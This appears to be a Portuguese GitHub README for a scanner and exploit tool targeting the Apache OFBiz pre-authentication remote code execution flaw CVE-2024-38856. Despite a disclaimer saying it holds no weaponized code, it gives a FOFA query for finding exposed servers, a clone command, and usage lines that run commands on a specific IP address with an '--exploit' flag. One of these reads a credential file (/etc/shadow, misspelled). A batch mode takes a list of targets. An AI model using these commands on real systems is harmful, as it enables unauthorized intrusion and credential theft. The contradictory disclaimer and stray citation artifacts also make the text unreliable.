
CVE-2024-38856: Scanner & Exploit de execução remota de código do Apache OFBiz
Propósito do repositório: documentação informativa sobre a CVE-2024-38856 (autorização incorreta / RCE pré-autenticação no Apache OFBiz).
Este repositório não contém código de exploit armamentizado. Destina-se somente a pesquisa defensiva, orientações de correção (patching), detecção e testes seguros em laboratório.
A CVE-2024-38856 é uma vulnerabilidade de autorização incorreta no Apache OFBiz que pode permitir acesso não autenticado a determinados endpoints e, sob condições específicas, possibilitar a execução de código de renderização de telas, o que pode levar à execução remota de código nos sistemas afetados. O problema foi corrigido no Apache OFBiz 18.12.15; versões anteriores até 18.12.14 são afetadas. :contentReference[oaicite:0]{index=0}
Gravidade / Impacto: diversos fornecedores de segurança e pesquisadores classificaram esta vulnerabilidade como crítica — ela pode levar à execução remota de código sem autenticação em instâncias vulneráveis e já foi observada em tentativas ativas de exploração no ambiente real (in the wild). Os administradores devem tratar as instâncias OFBiz expostas como itens de remediação de alta prioridade. :contentReference[oaicite:1]{index=1}
fofa : app="Apache_OFBiz" && port="8443"
git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.gitcd CVE-2024-38856-Apache-OFBiz└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"
─$ python3 apache_bang.py --file target.txt -c "ls"